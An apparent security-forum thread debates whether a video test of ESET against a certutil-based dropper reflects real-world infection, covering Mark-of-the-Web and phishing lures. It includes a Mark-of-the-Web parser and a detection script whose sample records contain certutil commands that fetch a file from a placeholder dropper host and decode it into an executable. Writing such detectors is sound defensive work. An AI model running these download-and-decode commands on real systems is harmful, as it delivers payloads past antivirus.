Again the object is initiated from the desktop. It lacks the MOTW embedded via being downloaded from the browser or other internet clients like email and chat. Files downloaded this way contain identifiers.
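The "identifiers" meant here are the Mark-of-the-Web: on NTFS, a browser or mail client writes a small ZoneTransfer block into an alternate data stream named `<file>:Zone.Identifier`, and a sample copied straight to the desktop has none. The script below is an added example, not code from the thread or from any AV vendor; it parses that stream format, reports whether the file came from the Internet zone, and reads the stream from disk on Windows (returning None where the stream or ADS support is absent). The sample stream text is constructed.

```python
"""Parse the Mark-of-the-Web (Zone.Identifier) stream that Windows attaches
to files saved by browsers, mail and chat clients.

Added example, not code from the thread. On NTFS the identifier lives in an
alternate data stream "<file>:Zone.Identifier"; parse_zone_identifier() works
on the stream's text so it runs anywhere, and read_motw() opens the stream
itself on Windows (None where the stream or ADS support is absent).
"""
import configparser
from dataclasses import dataclass
from typing import Optional

# URLZONE values as written in the ZoneTransfer section.
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}


@dataclass
class Motw:
    zone_id: int
    zone_name: str
    referrer_url: Optional[str]
    host_url: Optional[str]

    @property
    def from_internet(self) -> bool:
        # Zones 3 and 4 are what SmartScreen and AV products treat as untrusted.
        return self.zone_id >= 3


def parse_zone_identifier(text: str) -> Optional[Motw]:
    """Return the parsed identifier, or None if text is not a ZoneTransfer block."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as written in the stream
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if not cp.has_section("ZoneTransfer") or not cp.has_option("ZoneTransfer", "ZoneId"):
        return None
    sec = cp["ZoneTransfer"]
    try:
        zone_id = int(sec["ZoneId"].strip())
    except ValueError:
        return None
    return Motw(
        zone_id=zone_id,
        zone_name=ZONE_NAMES.get(zone_id, f"Unknown zone {zone_id}"),
        referrer_url=sec.get("ReferrerUrl"),
        host_url=sec.get("HostUrl"),
    )


def read_motw(path: str) -> Optional[Motw]:
    """Read and parse <path>:Zone.Identifier. None means no mark: a file copied
    from a desktop, a FAT-formatted USB stick, or a non-Windows host."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


# Constructed sample of what a browser writes next to a download.
SAMPLE_STREAM = """[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://example.test/downloads/
HostUrl=https://cdn.example.test/setup.exe
"""

if __name__ == "__main__":
    motw = parse_zone_identifier(SAMPLE_STREAM)
    print(motw, "untrusted" if motw and motw.from_internet else "trusted or unmarked")
```

A sample launched from the desktop after being copied there by the tester gives `read_motw()` nothing to read, which is exactly why the products under test never see the Internet-zone signal they would get from a real browser download.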
Just hide your keyboard when not in use, as some admin might sneak in there, modify a sample and launch it from the desktop on a non-standard account and infect your system.
Further proof there's no need for a home user to pay for a security suite.
When following real-world procedures (like AV-Test and AV-Comparatives) most AVs have near-perfect scores. The point Cruel Sister was making in her first video is that allowing a dropper through a LoLBin is a considerable risk factor (you don't know whether the downloaded file is good or bad). Her (in my opinion correct) warning that ESET could do better triggered a bombardment of criticism that the file dropped was not really malicious. That is why she posted the second video (which dropped something harmful and bricked user files).
Like a normal user would experience downloading a file, or the process of opening an email etc.? So these tests, including on YouTube where the file is already on the desktop, are only 1/2 the equation, of the malware (sample) already being on the desktop, on the PC?
Thank you for the explanation, Lenny, I appreciate it. From a member who is still learning about these things.
Now they are criticising @cruelsister's video again with the argument that it did not come through the "front door". That argument in itself is valid. People can't be infected out of nowhere. But for average PC users the most common routes of infection through the "front door" are responding to an email with either a prize or a tax invoice. The trick is to trigger an emotion (greed, anger and fear work the best). Another often-used route of infection is an average home user being redirected to a website looking like an antivirus telling you that you are infected (using the fear emotion) and that you need to download something.
So getting through the front door is trivial, but even using the front door approach ESET has its limitations (and CS's video shows why they probably missed the 1.8 percent of the "in the wild samples, using real-world scenarios" in the picture below).
[Attachment 282949: the test-results picture referred to above]
But as @Showdara posted, it just confirms his experience.
Good point, I forgot about that route.
It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
It is not real world. The file needs to be downloaded as stated above for the products to scan for indicators, unless it was, as you just suggested, from an inserted flash drive, which again habits like disabling autorun for those types of devices and scanning the files on them before use once inserted can negate.
It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
I am not following you, are you posting in the correct thread? There is no Microsoft Defender in this video and the user files were bricked.
Let's not repeat the discussion of the part 1 video.
It is a convincing video. The attack is not fully real-world but could be if the phishing was a starting point, or the attack was done from the infected flash drive.
Anyway, some points should be noted:
If we assume that points 1 and 2 are true, we can focus on what information can follow from the video.
- This video (and the previous one) does not show in any way that Eset's overall protection is worse compared to Microsoft Defender.
- The video tests can be misunderstood by many people who think that a failure on the example can prove some minority of the overall protection.
- Eset's detection was presented from the bright side. The malware undetected in the pre-execution stage, was detected in the post-execution stage. The detection was triggered soon after recognizing malicious actions.
- Microsoft Defender currently blocks that method, so it will probably be rarely used in the wild. It is not clear if Eset can have a sufficient advantage by blocking that method (this could increase the number of false positives). Furthermore, the attack can be blocked by a simple firewall rule for Certutil.
- That method is not malicious, so the decision to block it can be considered by the AV vendor if the attack can bypass other protection features.
- Blocking that method is probably uncommon among AVs on default settings (more examples needed).
- That method can be potentially dangerous when the payload is undetected by the AV.
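The "method" discussed in the list above is certutil.exe being driven as a download/decode LoLBin, which the thread notes can be stopped by a firewall rule for certutil and is blocked by Microsoft Defender. The script below is an added example, not code from the thread or from any vendor: it shows the detection side, flagging certutil invocations that fetch a URL (`-urlcache`/`-verifyctl` with `-f`) or unwrap a dropped base64 file (`-decode`), while letting a benign `-hashfile` call through. The process-creation records are constructed and simplified (PID, image path, command line), in the shape a SIEM would extract from Sysmon Event ID 1 or Windows Security 4688.

```python
"""Flag certutil.exe invocations used as a download/decode LoLBin.

Added example, not code from the thread or from any AV vendor. Input is a
list of constructed, simplified process-creation records (pid, image path,
command line) such as a SIEM would extract from Sysmon Event ID 1 or
Windows Security event 4688.
"""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# certutil switches documented for fetching or unwrapping remote content:
# -urlcache / -verifyctl together with -f fetch a URL; -decode unwraps base64.
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl"}
DECODE_SWITCHES = {"decode", "decodehex", "encode"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    reason: str
    url: Optional[str]


def _switches(argv: List[str]) -> Set[str]:
    # certutil accepts both "-" and "/" switch prefixes; normalise and lowercase.
    return {a[1:].lower() for a in argv[1:] if a[:1] in "-/" and len(a) > 1}


def inspect_process(pid: int, image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding for suspicious certutil use, None for anything else."""
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if basename != "certutil.exe":
        return None
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    sw = _switches(argv)
    urls = [a.strip('"') for a in argv if URL_RE.match(a.strip('"'))]
    if sw & DOWNLOAD_SWITCHES and "f" in sw:
        which = ",".join(sorted(sw & DOWNLOAD_SWITCHES))
        return Finding(pid, f"certutil fetching a URL ({which})", urls[0] if urls else None)
    if urls:
        return Finding(pid, "certutil given a URL argument", urls[0])
    if sw & DECODE_SWITCHES:
        return Finding(pid, "certutil used to decode/encode a payload", None)
    return None


def scan(events: List[Tuple[int, str, str]]) -> List[Finding]:
    return [f for f in (inspect_process(*e) for e in events) if f]


# Constructed sample records: a two-stage dropper (fetch, then decode), a benign
# hash check, a SysWOW64 variant using "/" switches, and a browser download.
SAMPLE_EVENTS = [
    (4120, r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -split -f http://dropper.example.test/x.txt C:\Users\Public\x.txt"),
    (4121, r"C:\Windows\System32\certutil.exe",
     r"certutil.exe -decode C:\Users\Public\x.txt C:\Users\Public\x.exe"),
    (4122, r"C:\Windows\System32\certutil.exe",
     r"certutil -hashfile C:\Windows\explorer.exe SHA256"),
    (4123, r"C:\Windows\SysWOW64\certutil.exe",
     r"certutil /verifyctl /f /split https://dropper.example.test/p.crt"),
    (4124, r"C:\Program Files\Mozilla Firefox\firefox.exe",
     r'"C:\Program Files\Mozilla Firefox\firefox.exe" http://dropper.example.test/x.txt'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.reason} url={f.url}")
```

Detection of this kind is the visibility half; the prevention half the thread mentions is an outbound firewall block for certutil.exe, which stops the fetch regardless of whether the payload is known to the AV. Command-line matching can be evaded (renamed copies of certutil, a different LoLBin), so treat a hit as a high-signal alert, not as the only control.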
Yes I know, that is why I asked are you posting in the correct thread. I also don't understand Andy's "Microsoft Defender currently blocks that method, so it will be probably rarely used in the wild". Microsoft is the champion of big data and compatibility (low FP rate); when they are blocking something it is most likely for a reason (which IMO adds credit to Cruel Sister's statement in video 1 that it is a risk factor to allow droppers through unusual LoLBin actions).
In part 1, MD succeeded in intercepting the attack, not Eset.
That's why he cites Microsoft Defender.